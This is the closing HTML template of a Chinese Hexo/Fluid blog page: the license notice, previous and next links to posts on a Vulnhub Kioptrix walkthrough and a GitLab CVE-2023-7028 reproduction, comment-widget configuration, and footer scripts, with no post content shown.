                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/23/vulnhub_kioptrix_level_2/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Vulnhub-Kioptrix_level_2</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/23/CVE-2023-7028_gitlab%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">
                        <span class="hidden-mobile">CVE-2023-7028_gitlab 任意用户密码重置漏洞复现</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"MgDyY5XEdtIKIZHTxzy3GBJV-gzGzoHsz","appKey":"P8Ab9EN1clJmhpYHpamFEiD9","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
